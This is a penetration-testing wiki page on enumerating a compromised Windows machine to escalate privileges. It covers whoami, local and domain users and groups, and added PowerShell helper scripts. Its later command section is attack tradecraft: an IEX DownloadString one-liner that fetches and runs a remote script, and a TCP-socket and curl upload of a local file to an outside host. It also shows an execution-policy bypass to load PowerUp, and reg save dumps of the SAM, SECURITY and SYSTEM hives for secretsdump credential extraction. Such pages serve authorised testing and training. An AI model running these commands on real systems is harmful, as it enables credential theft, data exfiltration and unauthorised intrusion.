---
description: >-
  Get information about a compromised machine from the to find possible ways to escalate privileges
---
For enumeration of network protocols like SMB, RPC, or LDAP, see #enumeration.
Users are important to understand on a computer or domain because they might have different or higher permissions than your current user. By understanding exactly how the users relate to each other and how privileges can be abused, you can quickly escalate privileges to reach the crown jewels.
For domain users/groups, #bloodhound can enumerate and analyze all the connections between them for a better understanding, and possible privilege escalation methods.
The `whoami` command can tell you what user you are running as, as well as some more detailed information about privileges and groups, using the `/all` flag:

```powershell
whoami /all
```
First comes simply the username and their SID. The part before the `\` tells you where the user comes from. If this is the same as the output of the `hostname` command, it is a local user on that computer.

```
USER INFORMATION
----------------

User Name        SID
================ ==============================================
WORKSTATION\user S-1-5-21-5386719015-7638691639-2457330780-1001
```
Next is the group information containing all the groups you are in. Some default ones you will always find here, but others have interesting properties, like `BUILTIN\Remote Desktop Users`, which allows logging in via RDP (port 3389), or custom groups that have a long SID.

You will also always find the `Mandatory Label\...` entry, called the "Integrity level". It is used as a base for what actions you can and can't do. It may have one of the following values:
- System: SYSTEM (kernel, ...)
- High: Elevated users (Administrators, with "Run as Administrator")
- Medium: Standard users (default, most often seen)
- Low: Restricted rights often used in sandboxed processes or for directories storing temporary data
- Untrusted: Lowest integrity level with extremely limited access rights for processes or objects that pose the most potential risk
```
GROUP INFORMATION
-----------------

Group Name                           Type             SID                                            Attributes
==================================== ================ ============================================== ==================================================
Everyone                             Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
WORKSTATION\group                    Alias            S-1-5-21-5386719015-7638691639-2457330780-1008 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users         Alias            S-1-5-32-555                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288
```
Lastly, there are the #privileges, each of which grants one specific thing that you are allowed to do. Some privileges, like `SeImpersonatePrivilege`, can be abused.

```
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeSecurityPrivilege           Manage auditing and security log          Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
```
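To read the same three sections of `whoami /all` without eyeballing the table, the following added example (not code from the original page) uses the documented `/fo csv` output mode of `whoami` and turns it into one object: the integrity level, whether the token is in `Remote Desktop Users`, custom local groups with a long machine SID, and which privileges from a short watch-list are enabled. The watch-list itself is an assumption of this example (names commonly audited), not something the page states, and the column names assume English `whoami` output.

```powershell
function Get-TokenSummary {
    # Added example: summarise the current token from whoami's CSV output.
    # ConvertFrom-Csv turns each row into an object whose properties are the
    # column headers ("Group Name", "Type", "SID", "Attributes" / "Privilege Name", "State").
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $privs  = whoami /priv   /fo csv | ConvertFrom-Csv

    # The integrity level is the S-1-16-* "Mandatory Label" row
    $integrity = ($groups | Where-Object { $_.SID -like 'S-1-16-*' }).'Group Name'

    # Custom local groups: Alias type, machine SID (S-1-5-21-...), RID >= 1000
    # (the index operator binds tighter than the [int] cast, so the cast applies to the RID)
    $customGroups = $groups | Where-Object {
        $_.Type -eq 'Alias' -and $_.SID -match '^S-1-5-21-' -and
        [int]($_.SID -split '-')[-1] -ge 1000
    }

    # Privilege watch-list: an assumption of this example, not from the page
    $watch = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
             'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege'
    $enabled = $privs | Where-Object {
        $_.State -eq 'Enabled' -and $watch -contains $_.'Privilege Name'
    }

    [pscustomobject]@{
        User           = (whoami)
        IntegrityLevel = $integrity
        RdpAllowed     = [bool]($groups | Where-Object { $_.SID -eq 'S-1-5-32-555' })
        CustomGroups   = @($customGroups | ForEach-Object { $_.'Group Name' })
        EnabledPrivs   = @($enabled | ForEach-Object { $_.'Privilege Name' })
    }
}

Get-TokenSummary | Format-List
```

Run it once before and once after any elevation attempt: `IntegrityLevel` should change from Medium to High, and `EnabledPrivs` is the first thing a reviewer checks when deciding whether a service account is over-privileged.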
While looking at our own user is interesting, we should also be looking at other users, how we can attack them, and exactly who to attack. To get all local users on a computer, use `Get-LocalUser` in PowerShell:

```powershell
PS C:\> Get-LocalUser

Name               Enabled Description
----               ------- -----------
Administrator      False   Built-in account for administering the computer/domain
user               True
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...
```
Users may be part of multiple groups. There are many default groups Windows uses, but custom ones can be made too. We can list them using `Get-LocalGroup` in PowerShell:

```powershell
PS C:\> Get-LocalGroup

Name                                Description
----                                -----------
group
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators                      Administrators have complete and unrestricted access to the computer/domain
Backup Operators                    Backup Operators can override security restrictions for the sole purpose of back...
Cryptographic Operators             Members are authorized to perform cryptographic operations.
Device Owners                       Members of this group can change system-wide settings.
Distributed COM Users               Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers                   Members of this group can read event logs from local machine
Guests                              Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators              Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS                           Built-in group used by Internet Information Services.
Network Configuration Operators     Members in this group can have some administrative privileges to manage configur...
Performance Log Users               Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users           Members of this group can access performance counter data locally and remotely
Power Users                         Power Users are included for backwards compatibility and possess limited adminis...
Remote Desktop Users                Members in this group are granted the right to logon remotely
Remote Management Users             Members of this group can access WMI resources over management protocols (such a...
Replicator                          Supports file replication in a domain
System Managed Accounts Group       Members of this group are managed by the system.
Users                               Users are prevented from making accidental or intentional system-wide changes an...
```
Lastly, to learn who the members of a group are, we can use `Get-LocalGroupMember`:

```powershell
PS C:\> Get-LocalGroupMember group

ObjectClass Name             PrincipalSource
----------- ----             ---------------
User        WORKSTATION\user Local
```
{% hint style="info" %}
Tip: Requesting this for the `Administrators` group tells you who to target!
{% endhint %}
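Instead of querying one group at a time, the added example below (not from the original page) joins `Get-LocalGroup` and `Get-LocalGroupMember` into a single membership table and marks the groups that carry elevated rights, so both an attacker looking for a target and an administrator reviewing who was added to `Administrators` get the same one-screen answer. The `$Privileged` list is an assumption of this example.

```powershell
function Get-LocalGroupReport {
    # Added example: every local group with its members in one table.
    # $Privileged is an assumed list of groups worth a closer look, not page content.
    param(
        [string[]]$Privileged = @('Administrators', 'Backup Operators',
                                  'Remote Desktop Users', 'Remote Management Users',
                                  'Hyper-V Administrators')
    )
    foreach ($group in Get-LocalGroup) {
        # Get-LocalGroupMember errors on groups holding orphaned SIDs; skip those quietly
        $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue
        foreach ($m in $members) {
            [pscustomobject]@{
                Group       = $group.Name
                Member      = $m.Name
                ObjectClass = $m.ObjectClass      # User or Group (nested membership)
                Source      = $m.PrincipalSource  # Local, ActiveDirectory, AzureAD, ...
                Privileged  = ($Privileged -contains $group.Name)
            }
        }
    }
}

# Privileged groups first, so the accounts that matter are at the top of the output
Get-LocalGroupReport | Sort-Object Privileged, Group -Descending | Format-Table -AutoSize
```

A domain group nested in a local privileged group shows up with `ObjectClass = Group` and `Source = ActiveDirectory`; that row is the one to follow up with the domain commands in the next part, because every member of that domain group inherits the local rights.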
Local users/groups only work on one computer, but domain users/groups work on all domain-joined computers. To list all domain users, use the `net user` command with the `/domain` flag:

```powershell
PS C:\> net user /domain

User accounts for \\DC1.corp.com

-------------------------------------------------------------------------------
Administrator            user1                    Guest
user2                    admin1                   admin2
krbtgt
```
There you find some default users like Administrator, Guest, and krbtgt, but also all other users on the domain. To get more detailed information about one user, include their name in the command:

```powershell
PS C:\> net user "admin1" /domain

User name                    admin1
Full Name
Comment
User's comment
...
Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
```
These users can also be part of groups, which you can list. There are several default groups, all with their own special group policies saying what they can and can't do. List them with `net group`:

```powershell
PS C:\> net group /domain

Group Accounts for \\DC1.corp.com

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*Debug
*Development
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
```
If we want to learn more about a custom group, or just see who is a member of the group, we can also include that group name in the command:

```powershell
PS C:\> net group "Development" /domain

Group name     Development
Comment

Members

-------------------------------------------------------------------------------
user2
```
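Doing the per-group lookup above by hand for every group gets tedious on a real domain. The following added example (not the page's own code) walks every group that `net group /domain` prints and parses the member list of each into `Group`/`Member` pairs, so you can ask both "who is in Domain Admins" and "which groups is user2 in" from one table. It assumes a domain-joined host with English `net` output; the fixed-width parsing (three 25-character columns per member line) matches how `net` lays out the member list.

```powershell
function Get-DomainGroupMap {
    # Added example: map every domain group to its members using only `net`.
    # Assumes a domain-joined host and English output from net.exe.
    $groups = net group /domain 2>$null |
        Where-Object { $_ -match '^\*' } |
        ForEach-Object { $_.TrimStart('*').Trim() }

    foreach ($g in $groups) {
        $out = net group "$g" /domain 2>$null
        $inMembers = $false
        foreach ($line in $out) {
            # Members start after the dashed separator and stop at the status line
            if ($line -match '^-{10,}') { $inMembers = $true; continue }
            if (-not $inMembers -or $line -match '^The command completed') { continue }
            # net prints members in three fixed-width columns of 25 characters;
            # splitting on whitespace would break names that contain spaces
            $padded = $line.PadRight(75)
            foreach ($offset in 0, 25, 50) {
                $member = $padded.Substring($offset, 25).Trim()
                if ($member) { [pscustomobject]@{ Group = $g; Member = $member } }
            }
        }
    }
}

$map = Get-DomainGroupMap

# Members of the most privileged groups
$map | Where-Object { $_.Group -in 'Domain Admins', 'Enterprise Admins' }

# Every group a single account belongs to (user2 is the example account from above)
$map | Where-Object Member -eq 'user2'
```

Note that `net group` only shows global groups and direct members; nested membership through universal or domain local groups is not expanded here, which is exactly the gap that #bloodhound fills.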
This section contains a set of useful commands for CMD or PowerShell that you'll often look for while enumerating a compromised machine.
Before doing manual enumeration, getting an idea of the system through automated means might be quicker. The WinPEAS script is the Windows equivalent of the well-known LinPEAS script for Linux. It enumerates many common misconfigurations in the system and tries to find vulnerabilities. This generates a lot of output to sift through, but it is very useful output that would normally require a ton of manual work.
To run it, download the latest `winPEASany.exe` from the Releases page, or host it on a local HTTP server and download it from there if your target cannot access the public internet:

{% code title="Run WinPEAS" overflow="wrap" %}
```powershell
cd /Windows/Tasks # world-writable directory
# wget is an alias for Invoke-WebRequest in Windows PowerShell; -o alone is ambiguous (-OutFile/-OutVariable/-OutBuffer), so spell out -OutFile
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -OutFile winPEASany.exe
.\winPEASany.exe | Tee-Object winPEAS.txt # write output to a file (may take long)
```
{% endcode %}
Another such tool is PowerUp.ps1, which looks for more directly exploitable vulnerabilities and has commands to automatically exploit them too:

{% code title="Run PowerUp.ps1" overflow="wrap" %}
```powershell
wget https://github.com/PowerShellMafia/PowerSploit/raw/master/Privesc/PowerUp.ps1 -OutFile PowerUp.ps1
# It is a module, and to import it we need to bypass the execution policy
powershell -ep bypass
. .\PowerUp.ps1
# Now that it is imported into the current shell, we can run its commands
Invoke-PrivescAudit
```
{% endcode %}
```powershell
Test-NetConnection -Port 22 10.10.10.10
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10", $_)) "TCP port $_ is open"} 2>$null
```

↳ The above loop is very slow because it goes through ports one by one with a timeout
```powershell
net view \\dc01 /all
```

```powershell
dism /online /Enable-Feature /FeatureName:TelnetClient
telnet 10.10.10.10 25 # SMTP
```

↳ This feature needs to be already enabled, or enabled by you as an administrator
{% code title="wget $URL -O $FILE" %}
```powershell
# -o alone is ambiguous for Invoke-WebRequest; use -OutFile
iwr http://10.10.10.10/file.txt -OutFile file.txt
```
{% endcode %}

{% code title="curl $IP | sh" %}
```powershell
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/script.ps1');
```
{% endcode %}
```powershell
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect("10.10.10.10", 8000)
$writer = New-Object System.IO.StreamWriter($client.GetStream())
$bytes = (Get-Content -Encoding byte "C:\Windows\win.ini") # Windows PowerShell 5.1; PowerShell 7 uses -AsByteStream
$writer.BaseStream.Write($bytes, 0, $bytes.Length)
$writer.Flush()
```

↳ For larger file transfers, you can also do this over HTTP with `python3 -m uploadserver`:

```powershell
curl.exe -X POST http://10.10.10.10:8000/upload -F 'files=@C:\Windows\win.ini'
```
```powershell
Get-ChildItem -File -Recurse -ErrorAction SilentlyContinue
# Or to get a nice tree view:
tree /F
```

```powershell
dir -Recurse | Select-String -Pattern "password"
```

```powershell
icacls C:\Path\To\DirOrFile
# Output reference: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls#remarks
```
{% code title="List disks (C:, D:, etc.)" %}
```powershell
wmic logicaldisk get deviceid,volumename,description
```
{% endcode %}
One interesting location to check is `C:\Windows\System32\config\`, where normally only administrators should be able to read the contents. Permissions may be misconfigured, or you may find the same files backed up in another readable place, but these are the interesting ones:

- `SAM` - stores local cached credentials, known as SAM secrets
- `SECURITY` - stores domain cached credentials, known as LSA secrets
- `SYSTEM` - contains information to decrypt both SAM and LSA secrets above
On a running system, you often cannot copy these files directly because they are in use. With backups this is not the case, but on a running system you can use `reg` to export them live:

{% code title="Export from live system" %}
```powershell
reg save HKLM\SAM "C:\Windows\Temp\SAM"
reg save HKLM\SECURITY "C:\Windows\Temp\SECURITY"
reg save HKLM\SYSTEM "C:\Windows\Temp\SYSTEM"
```
{% endcode %}
When these three files, either copied directly or exported, are copied to your local machine, it is time to extract credentials from them. Using secretsdump.py it is possible to parse the three files like so:

{% code title="Extract credentials" overflow="wrap" %}
```bash
secretsdump.py -sam 'SAM' -security 'SECURITY' -system 'SYSTEM' LOCAL
```
{% endcode %}
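Whether the hive files are actually exposed to the current user is the question behind the "permissions may be misconfigured" remark above. The added example below (not code from the original page) tries to open each hive read-only and distinguishes three outcomes: access denied (the expected result for a standard user), a sharing violation (the OS holds the live hive exclusively, so the ACL was never the blocker), and a successful open (a misconfigured ACL or a stale backup copy that should not be readable). The two backup folders are an assumption about typical locations, not something the page lists.

```powershell
function Test-HiveAccess {
    # Added example: check, as the current user, whether SAM/SECURITY/SYSTEM or
    # common backup copies of them can be opened for reading.
    # The backup directories are assumed locations, not from the page.
    $dirs = 'C:\Windows\System32\config',
            'C:\Windows\System32\config\RegBack',
            'C:\Windows\Repair'
    foreach ($dir in $dirs) {
        foreach ($hive in 'SAM', 'SECURITY', 'SYSTEM') {
            $path = Join-Path $dir $hive
            try {
                # Read-only open that tolerates other readers/writers: the access check
                # happens before the sharing check, so "denied" and "in use" stay distinct
                $fs = [System.IO.File]::Open($path, 'Open', 'Read', 'ReadWrite')
                $fs.Dispose()
                $state = 'READABLE'        # misconfigured ACL or stale backup copy
            } catch [System.IO.FileNotFoundException], [System.IO.DirectoryNotFoundException] {
                continue                   # not present here; nothing to report
            } catch [System.UnauthorizedAccessException] {
                $state = 'AccessDenied'    # expected for a non-admin user
            } catch [System.IO.IOException] {
                $state = 'InUse'           # locked by the OS; use `reg save` as an admin instead
            }
            [pscustomobject]@{
                Path  = $path
                State = $state
                # Size and owner are informational; Get-Acl needs READ_CONTROL and may return nothing
                Size  = (Get-Item -LiteralPath $path -ErrorAction SilentlyContinue).Length
                Owner = (Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue).Owner
            }
        }
    }
}

Test-HiveAccess | Format-Table -AutoSize
```

Any `READABLE` row from a standard-user shell is a finding in its own right: the file can be copied out and fed to `secretsdump.py` as shown above, and on the defensive side it is the ACL (or the leftover backup) that needs fixing.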
```powershell
Get-History
# Raw method below can bypass Clear-History
type (Get-PSReadlineOption).HistorySavePath
# Get verbose script block events (may be large)
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath "*[System[EventID=4104]]" | Export-Csv -Path 'ScriptBlockEvents.csv' -NoTypeInformation
```
```powershell
Import-Module .\PowerView.ps1
$sid = (get-domainuser j0r1an).objectsid
Get-ObjectACL | ? {$_.SecurityIdentifier -eq $sid} | select ObjectDN,ActiveDirectoryRights
```
```powershell
# List all services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Start/stop a service if you are allowed
net stop $SERVICE_NAME
net start $SERVICE_NAME
```
{% embed url="https://lolbas-project.github.io/" %} A list of builtin Windows binaries and commands that can download, execute and do other interesting things {% endembed %}